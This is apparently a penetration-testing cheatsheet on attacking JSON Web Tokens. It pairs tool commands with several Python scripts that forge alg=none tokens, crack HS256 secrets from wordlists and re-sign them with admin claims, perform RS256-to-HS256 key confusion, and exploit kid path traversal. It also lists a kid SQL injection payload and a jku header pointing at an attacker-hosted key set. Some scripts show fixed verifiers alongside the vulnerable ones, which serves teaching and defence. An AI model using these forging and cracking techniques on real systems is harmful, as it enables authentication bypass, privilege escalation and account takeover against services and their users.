web-pentest

JWT Attacks

JSON Web Token attacks — decoding, alg=none, weak-secret cracking (hashcat/jwt_tool), RS256→HS256 key confusion, claim tampering and kid/jku/x5u header injection.

Jun 2026 lazyhackers
Recon & Decode (3)
for p in $(echo "$JWT" | cut -d. -f1,2 | tr '.' ' '); do printf '%s' "$p" | tr '_-' '/+' | awk '{n=(4-length($0)%4)%4; while(n-->0) $0=$0"="; print}' | base64 -d 2>/dev/null; echo; done
Decode header and payload without verifying (JWT segments are unpadded base64url, so swap -_ for +/ and restore the padding or base64 -d chokes)
decode recon
python3 jwt_tool.py <JWT>
Parse and display a token with jwt_tool
jwt_tool recon
jwt_tool <JWT> -T
Interactive tamper mode
jwt_tool tamper
alg=none Bypass (2)
jwt_tool <JWT> -X a
Forge a token with alg=none (strip the signature)
algnone forge
base64url('{"alg":"none"}') . base64url(payload) .
Manual alg=none: keep the trailing dot with an empty signature; some libraries only fall for case variants (None/NONE/nOnE), which -X a also tries
algnone manual
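As an added worked example (not code from the cheatsheet or from jwt_tool), the decode step and the alg=none forge from above, run against two toy verifiers: a lax one that takes the algorithm from the header and a strict one that pins it. The secret, claims and both verifiers are constructed for the demo; only the standard library is used.

```python
"""Decode a JWT without verifying it, then forge an alg=none token.

Added example, not code from the cheatsheet. Stdlib only. The secret, claims
and the two toy verifiers are constructed for the demo.
"""
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    # JWT segments are unpadded base64url; restore the padding first
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode(token: str):
    """Header and payload as dicts; the signature is not checked."""
    h, p, _sig = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def hs256(data: str, secret: bytes) -> str:
    return b64url_encode(hmac.new(secret, data.encode(), hashlib.sha256).digest())


def make_hs256(payload: dict, secret: bytes) -> str:
    data = segment({"alg": "HS256", "typ": "JWT"}) + "." + segment(payload)
    return data + "." + hs256(data, secret)


def forge_none(token: str, **new_claims) -> str:
    """Copy the payload with edited claims, set alg=none, empty signature (trailing dot)."""
    _header, payload = decode(token)
    payload.update(new_claims)
    return segment({"alg": "none", "typ": "JWT"}) + "." + segment(payload) + "."


def verify_lax(token: str, secret: bytes):
    """VULNERABLE: the algorithm is taken from the attacker-controlled header."""
    h, p, sig = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "none":  # "no signature" is honoured, so any payload passes
        return json.loads(b64url_decode(p))
    if alg == "HS256" and hmac.compare_digest(sig, hs256(h + "." + p, secret)):
        return json.loads(b64url_decode(p))
    return None


def verify_strict(token: str, secret: bytes):
    """Fixed: the server pins HS256; the header's alg is never consulted."""
    h, p, sig = token.split(".")
    if hmac.compare_digest(sig, hs256(h + "." + p, secret)):
        return json.loads(b64url_decode(p))
    return None


if __name__ == "__main__":
    SECRET = b"constructed-demo-secret"  # constructed, not a real key
    original = make_hs256({"sub": "alice", "role": "user"}, SECRET)
    print("decoded:", decode(original))
    forged = forge_none(original, role="admin")
    print("forged :", forged)
    print("lax    :", verify_lax(forged, SECRET))     # accepted with role=admin
    print("strict :", verify_strict(forged, SECRET))  # None
```

The lax verifier only matches the lowercase literal "none"; a library that compares case-insensitively is why the None/NONE/nOnE variants are worth sending too.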
Weak Secret Cracking (3)
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
Crack an HS256 signing secret offline
crack hashcat hs256
jwt_tool <JWT> -C -d /usr/share/wordlists/rockyou.txt
Dictionary-crack the HMAC secret with jwt_tool
crack jwt_tool
john jwt.txt --wordlist=rockyou.txt --format=HMAC-SHA256
Crack the secret with John; its HMAC-SHA256 format expects `header.payload#hexsig`, so convert the token first (e.g. jwt2john.py), whereas hashcat -m 16500 takes the raw JWT
crack john
Key Confusion (RS256 -> HS256) (2)
jwt_tool <JWT> -X k -pk public.pem
Sign HS256 with the RSA public key bytes as the HMAC secret (alg confusion); the PEM must be byte-identical, trailing newline included, to what the server loaded, so retry with formatting variants if the first attempt is rejected
confusion rs256 hs256
openssl s_client -connect target.com:443 -servername target.com </dev/null 2>/dev/null | openssl x509 -pubkey -noout > public.pem
Recover a candidate public key from the TLS certificate; the JWT signing key is often a different one, so also check /.well-known/jwks.json and /jwks.json
confusion pubkey
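As an added example (not the cheatsheet's or jwt_tool's code), the confusion attack against a toy server whose verify(token, key) lets the header choose how the key is used, together with the byte-exactness problem noted above: the forge is retried over a few variants of the PEM bytes until the server accepts one. PUBLIC_PEM is a constructed placeholder standing in for the bytes pulled from the TLS cert or JWKS; because only the standard library is used, the RS256 branch of the toy verifier simply rejects, where a real server would run an RSA check.

```python
"""RS256 -> HS256 key confusion against a verifier that trusts the header alg.

Added example, not from the cheatsheet. Stdlib only: the RS256 branch of the
toy verifier just rejects (a real server would RSA-verify there); the attack
only needs the HS256 branch, which HMACs with whatever key bytes the server
loaded. PUBLIC_PEM is a constructed placeholder, not a real key.
"""
import base64
import hashlib
import hmac
import json

PUBLIC_PEM = (  # constructed placeholder for the bytes taken from the cert/JWKS
    b"-----BEGIN PUBLIC KEY-----\n"
    b"CONSTRUCTEDPLACEHOLDERNOTAREALKEYCONSTRUCTEDPLACEHOLDERNOTAREALKEY\n"
    b"-----END PUBLIC KEY-----\n"
)


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def hs256(data: str, key: bytes) -> str:
    return b64url_encode(hmac.new(key, data.encode(), hashlib.sha256).digest())


def server_verify(token: str, key_material: bytes):
    """VULNERABLE verify(token, key): the header decides how `key` is used.
    This is the shape of jwt.decode(token, public_key) with no algorithms= pin."""
    h, p, sig = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "HS256":
        ok = hmac.compare_digest(sig, hs256(h + "." + p, key_material))
        return json.loads(b64url_decode(p)) if ok else None
    # RS256 (and anything else): in this stdlib demo there is no RSA check, so reject;
    # on a real server this is where the public key would verify an RSA signature
    return None


def forge_confused(payload: dict, key_material: bytes) -> str:
    """HS256-sign with the public key bytes as the HMAC secret."""
    data = segment({"alg": "HS256", "typ": "JWT"}) + "." + segment(payload)
    return data + "." + hs256(data, key_material)


def key_variants(pem: bytes) -> dict:
    """Byte variants of the PEM a server may hold in memory, most likely first."""
    stripped = pem.rstrip(b"\r\n")
    body = b"".join(l for l in pem.splitlines() if not l.startswith(b"-----"))
    return {
        "exact": pem,
        "no_trailing_newline": stripped,
        "crlf": b"\r\n".join(stripped.splitlines()) + b"\r\n",
        "base64_body_only": body,
    }


def confusion_attack(payload: dict, pem: bytes, verify):
    """Try each variant until the target accepts; returns (variant, token) or (None, None)."""
    for name, km in key_variants(pem).items():
        tok = forge_confused(payload, km)
        if verify(tok) is not None:
            return name, tok
    return None, None


if __name__ == "__main__":
    claims = {"sub": "alice", "role": "admin"}
    # server loaded the PEM exactly as written to disk
    print(confusion_attack(claims, PUBLIC_PEM, lambda t: server_verify(t, PUBLIC_PEM)))
    # server stripped the trailing newline while loading: "exact" fails, next variant lands
    loaded = PUBLIC_PEM.rstrip(b"\n")
    print(confusion_attack(claims, PUBLIC_PEM, lambda t: server_verify(t, loaded)))
```

The fix on the server side is the one the toy verifier lacks: pin the expected algorithm (RS256 only for an RSA key) before touching key material, so a symmetric HMAC is never computed over an asymmetric key.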
Claim Tampering (2)
edit {"role":"admin"} / {"admin":true} / {"sub":"administrator"}
Escalate by editing privilege claims, then re-sign
tamper privesc
jwt_tool <JWT> -I -pc role -pv admin -S hs256 -p secret
Inject a claim and re-sign with a known secret
tamper jwt_tool
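As an added example (not the cheatsheet's code) serving both the cracking section and the claim-tampering entries above: the dictionary loop that hashcat -m 16500 and jwt_tool -C run at speed, followed by the re-sign step that jwt_tool -I ... -S hs256 -p <secret> performs. The captured token and the wordlist are constructed; the standard library is all that is needed.

```python
"""Offline dictionary attack on an HS256 secret, then re-sign with escalated claims.

Added example, not the cheatsheet's code. CAPTURED and WORDLIST are constructed.
"""
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def hs256(data: str, secret: bytes) -> str:
    return b64url_encode(hmac.new(secret, data.encode(), hashlib.sha256).digest())


def make_hs256(payload: dict, secret: bytes) -> str:
    data = segment({"alg": "HS256", "typ": "JWT"}) + "." + segment(payload)
    return data + "." + hs256(data, secret)


def verify_hs256(token: str, secret: bytes):
    data, sig = token.rsplit(".", 1)
    if hmac.compare_digest(sig, hs256(data, secret)):
        return json.loads(b64url_decode(data.split(".")[1]))
    return None


def crack_hs256(token: str, candidates):
    """Return the first candidate (bytes) whose HMAC over header.payload matches the signature."""
    data, sig = token.rsplit(".", 1)
    target = b64url_decode(sig)
    for word in candidates:
        word = word.strip()  # wordlist lines carry their newline
        if hmac.compare_digest(hmac.new(word, data.encode(), hashlib.sha256).digest(), target):
            return word
    return None


def resign(token: str, secret: bytes, **claims) -> str:
    """Keep the original header, edit the claims, sign again with the recovered secret."""
    h, p, _sig = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload.update(claims)
    data = h + "." + segment(payload)
    return data + "." + hs256(data, secret)


# Constructed stand-in for a token captured from the target, signed with a weak secret
CAPTURED = make_hs256({"sub": "alice", "role": "user"}, b"password1")
# Constructed rockyou-style wordlist (one candidate per line, newlines included)
WORDLIST = [b"123456\n", b"password\n", b"password1\n", b"letmein\n"]

if __name__ == "__main__":
    secret = crack_hs256(CAPTURED, WORDLIST)
    print("recovered secret:", secret)
    admin = resign(CAPTURED, secret, role="admin")
    print("admin token:", admin)
    print("server sees:", verify_hs256(admin, secret))
```

To run it against a real wordlist, pass `open("/usr/share/wordlists/rockyou.txt", "rb")` as the candidates; the file iterator yields the bytes lines this loop expects.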
Header Injection (kid / jku / x5u) (4)
"kid":"../../../../dev/null"
kid path traversal to a file with known contents; /dev/null reads as empty, so re-sign HS256 with an empty secret
kid traversal
"kid":"x' UNION SELECT 'mysecret'-- -"
kid SQL injection: the UNION result becomes the verification key, so sign HS256 with 'mysecret'
kid sqli
jwt_tool <JWT> -X s -ju http://10.10.14.1/jwks.json
jku/x5u header: host the jwttool_custom_jwks.json that jwt_tool generates on your server and point verification at it
jku jwks ssrf
jwt_tool <JWT> -M at -t https://target.com/api -rh "Authorization: Bearer jwt_tool"
Run all tests against a live endpoint; the literal placeholder jwt_tool in the header is replaced by each test token
jwt_tool scan
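As an added example (not from the cheatsheet) of the kid traversal entry above: a toy verifier that turns the kid header into a file name under its key directory, the forged token that walks out to /dev/null and is therefore signed with an empty key, and the hardened loader that rejects it. The key directory is a temp directory created at runtime with one constructed key; /dev/null is real, so this runs on POSIX only. Standard library only.

```python
"""kid header path traversal: a verifier that uses kid as a file name under its key dir.

Added example, not from the cheatsheet. KEY_DIR is a temp directory created at
runtime holding one constructed key; the traversal target /dev/null is real.
"""
import base64
import hashlib
import hmac
import json
import os
import re
import tempfile


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def hs256(data: str, key: bytes) -> str:
    return b64url_encode(hmac.new(key, data.encode(), hashlib.sha256).digest())


KEY_DIR = tempfile.mkdtemp(prefix="jwt-keys-")
with open(os.path.join(KEY_DIR, "k1"), "wb") as _f:
    _f.write(b"constructed-signing-key-k1")  # constructed demo key, not a real one

# enough ../ to reach / from any depth; extra ../ at the root is a no-op
TRAVERSAL_KID = "../../../../../../../../dev/null"


def load_key_vulnerable(kid: str) -> bytes:
    # VULNERABLE: kid is joined onto KEY_DIR unvalidated, so ../ walks out of the
    # directory and /dev/null reads as b"", i.e. the attacker signs with an empty secret
    with open(os.path.join(KEY_DIR, kid), "rb") as f:
        return f.read()


KID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def load_key_fixed(kid: str) -> bytes:
    # Fixed: allowlist the kid syntax, then confirm the resolved path is a direct
    # child of KEY_DIR (defeats ../, absolute paths and symlink tricks)
    if not KID_RE.fullmatch(kid):
        raise ValueError("kid rejected")
    path = os.path.realpath(os.path.join(KEY_DIR, kid))
    if os.path.dirname(path) != os.path.realpath(KEY_DIR):
        raise ValueError("kid escapes key dir")
    with open(path, "rb") as f:
        return f.read()


def verify(token: str, load_key):
    """Look the key up by kid with the given loader, then check the HS256 signature."""
    h, p, sig = token.split(".")
    header = json.loads(b64url_decode(h))
    try:
        key = load_key(str(header.get("kid", "")))
    except (OSError, ValueError):
        return None
    if hmac.compare_digest(sig, hs256(h + "." + p, key)):
        return json.loads(b64url_decode(p))
    return None


def forge_with_kid(payload: dict, kid: str, key: bytes) -> str:
    data = segment({"alg": "HS256", "typ": "JWT", "kid": kid}) + "." + segment(payload)
    return data + "." + hs256(data, key)


if __name__ == "__main__":
    forged = forge_with_kid({"sub": "alice", "role": "admin"}, TRAVERSAL_KID, b"")
    print("vulnerable loader:", verify(forged, load_key_vulnerable))  # role=admin accepted
    print("fixed loader     :", verify(forged, load_key_fixed))       # None
```

The same loader shape is what makes the SQL-injection and jku variants work: whenever the token tells the server where to fetch the key from, the attacker picks key material they already know.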